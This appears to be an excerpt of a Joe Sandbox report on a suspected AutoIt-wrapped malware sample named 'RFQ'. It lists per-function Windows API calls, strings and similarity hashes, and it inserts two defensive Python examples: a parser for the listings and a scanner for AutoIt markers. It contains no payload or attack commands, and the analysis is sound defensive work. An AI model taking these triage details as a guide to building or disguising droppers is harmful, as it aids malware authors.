                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
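The APIs listing above is rendered as free text; when triaging many functions it helps to load it into records. The following is an added example, not Joe Sandbox code or output: a parser for the `• Name.MODULE(args), ref: ADDR` lines, including the indented "Part of subcall function" entries, that also recovers the string literals the report folds into the Similarity block's String ID. The regular expression, record layout and helper names are this example's own assumptions about the rendered format; the sample input is the listing of this function copied from the report.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report into records."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One API line as rendered in the report. Three shapes occur on this page:
#   • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
#   • __mtterm.LIBCMT ref: 00417C34                       (no argument list)
#   • Part of subcall function 004178FF: TlsFree.KERNEL32(...), ref: 0041792A
# The pattern is an assumption about the rendering, not a documented format.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the line is "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the API calls in report order; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(raw_args.split(",")) if raw_args else ()
        sub = m.group("sub")
        calls.append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(sub, 16) if sub else None,
        ))
    return calls


def string_arguments(calls: List[ApiCall]) -> List[str]:
    """Arguments the report resolved to a string literal (not a 32-bit value and not '?')."""
    found = {a for c in calls for a in c.args if a and a != "?" and not HEX32.match(a)}
    return sorted(found)


def string_id_key(calls: List[ApiCall]) -> str:
    """'$'-joined sorted string literals; for this function it equals the Similarity String ID."""
    return "$".join(string_arguments(calls))


def direct_api_names(calls: List[ApiCall]) -> List[str]:
    """Unique Name.MODULE pairs called directly by the function (subcall lines excluded)."""
    return sorted({f"{c.name}.{c.module}" for c in calls if c.subcall_of is None})


# Constructed input: the APIs listing of the CRT-initialisation function above, copied from this report.
SAMPLE_LISTING = """\
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
• __init_pointers.LIBCMT ref: 00417CE6
• __calloc_crt.LIBCMT ref: 00417D54
• GetCurrentThreadId.KERNEL32 ref: 00417D80
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LISTING)
    print(f"{len(parsed)} calls, String ID key: {string_id_key(parsed)}")
    for c in parsed:
        print(c)
```

For this function the recovered string set is `FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL`, the same value the report prints as String ID in the Similarity block below; the GetProcAddress lookups of the Fls* family together with __mtterm and __init_pointers are the shape of MSVC CRT start-up code rather than of the payload.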
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 4163708885-3819984048
                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                          • API String ID: 0-1896584978
                                                                          • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                          • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
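The function above references the string `>>>AUTOIT SCRIPT<<<`, the marker AutoIt embeds in compiled scripts; seeing it in an image is a quick triage signal that the dropper is an AutoIt wrapper around the payload. The following is an added example and not part of this report: a scanner that searches a file for that banner in both ASCII and UTF-16LE. It also looks for `AU3!EA06`, the well-known magic at the head of the embedded AutoIt3 script resource; that value is general knowledge assumed by the example and does not appear in this report. The sample buffer is constructed.

```python
"""Flag an executable that embeds the AutoIt compiled-script banner."""
from typing import Dict, List

# Markers searched for, in both encodings an AutoIt binary may store them in.
# The banner is what this report shows in the function above; the AU3!EA06 magic
# is the well-known header of the embedded AutoIt3 script resource and is an
# assumption of this example, not something the report shows.
MARKERS: Dict[str, str] = {
    "autoit_script_banner": ">>>AUTOIT SCRIPT<<<",
    "au3_resource_magic": "AU3!EA06",
}
ENCODINGS = ("ascii", "utf-16-le")


def find_autoit_markers(data: bytes) -> List[dict]:
    """Every occurrence of a marker as {'marker', 'encoding', 'offset'}, sorted by offset."""
    hits = []
    for label, text in MARKERS.items():
        for enc in ENCODINGS:
            needle = text.encode(enc)
            pos = data.find(needle)
            while pos != -1:
                hits.append({"marker": label, "encoding": enc, "offset": pos})
                pos = data.find(needle, pos + 1)
    return sorted(hits, key=lambda h: h["offset"])


def looks_autoit_compiled(data: bytes) -> bool:
    """True when the banner seen in this sample is present in either encoding."""
    return any(h["marker"] == "autoit_script_banner" for h in find_autoit_markers(data))


def scan_file(path: str) -> List[dict]:
    """Scan a file on disk (for example a memory dump downloaded from the report)."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed input: a fake PE-like buffer carrying the banner as UTF-16LE and the magic as ASCII.
SAMPLE = (
    b"MZ" + b"\x00" * 0x40
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    + b"\x00" * 8
    + b"AU3!EA06"
    + b"\x00" * 16
)
# Constructed input with neither marker.
CLEAN = b"MZ" + b"\x00" * 0x80

if __name__ == "__main__":
    import sys
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_autoit_markers(SAMPLE)
    for h in hits:
        print(f"{h['marker']:<22} {h['encoding']:<9} @ 0x{h['offset']:08x}")
    print("AutoIt-compiled:", looks_autoit_compiled(SAMPLE if len(sys.argv) < 2 else open(sys.argv[1], 'rb').read()))
```

Run it against the dumped image (`python scan.py dump.bin`) rather than only the on-disk sample: a packed dropper may not expose the banner until the image is unpacked in memory, and the memory dumps listed under "Memory Dump Source" are exactly where the report found it.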
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2485277191-404129466
                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                          APIs
                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                          • String ID: D
                                                                          • API String ID: 1914653954-2746444292
                                                                          • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                          • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1153243558-438819550
                                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll
                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                          • API String ID: 3832890014-4202584635
                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$CtrlFocus
                                                                          • String ID: 0
                                                                          • API String ID: 1534620443-4108050209
                                                                          • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                          • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroy
                                                                          • String ID: ,$tooltips_class32
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                          • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                          • GetMenuItemCount.USER32 ref: 00468CFD
                                                                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                          • GetCursorPos.USER32(?), ref: 00468D3F
                                                                          • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                          • String ID: 0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                          • SendMessageW.USER32 ref: 00471740
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
